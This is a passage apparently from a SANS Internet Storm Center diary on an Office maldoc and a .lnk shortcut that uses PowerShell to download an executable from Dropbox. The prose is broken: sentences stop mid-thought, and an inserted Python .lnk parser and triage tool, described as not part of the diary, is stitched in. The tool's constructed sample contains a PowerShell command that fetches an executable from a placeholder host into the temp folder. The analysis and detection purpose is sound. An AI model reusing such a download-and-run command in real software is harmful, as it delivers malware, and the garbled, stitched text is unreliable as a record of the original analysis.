Office maldoc + .lnk, (Sat, Jul 15th)

Reader nik submitted a malicious document. It


And then we can use Woanware

Unfortunately, the .lnk file does not contain interesting metadata. But we can see that it uses PowerShell to download an executable from Dropbox.
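As an added illustration (not code from this diary or from the tool it uses), here is a small Python parser for the StringData section of a .lnk file. It surfaces the command line a shortcut runs, which is where a PowerShell download like the one described above becomes visible. The function names, the sample shortcut and its URL are constructed for the example.

```python
import re
import struct

# LinkFlags bits from the Shell Link (.lnk) header
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields (relative path, arguments, ...) of a .lnk."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_IDLIST:      # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:    # LinkInfoSize (4 bytes) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    # Assumption: non-Unicode strings are decoded as cp1252
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    fields = {}
    for bit, name in STRING_FIELDS:   # present fields appear in this order
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            end = pos + 2 + count * width
            if end > len(data):
                raise ValueError("truncated StringData")
            fields[name] = data[pos + 2:end].decode(codec, "replace")
            pos = end
    return fields


def triage(data: bytes) -> dict:
    """Flag a shortcut that runs PowerShell and list URLs on its command line."""
    f = parse_lnk_strings(data)
    cmd = " ".join(f.get(k, "") for k in ("relative_path", "arguments"))
    return {"powershell": bool(re.search(r"powershell", cmd, re.I)),
            "urls": re.findall(r"https?://[^\s'\"|)]+", cmd, re.I)}


def build_sample() -> bytes:
    """Constructed test shortcut: header + relative path + arguments only."""
    header = struct.pack("<I16sI", 0x4C, bytes(16), 0x08 | 0x20 | IS_UNICODE)
    header += bytes(76 - len(header))
    path = r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    args = '-c "iwr https://files.example.invalid/placeholder.exe -OutFile $env:TEMP\\p.exe"'
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (path, args))
    return header + body
```

On a real shortcut, read the file in binary mode and pass the bytes to `triage()`. The extracted URLs can then be checked against proxy logs.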

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.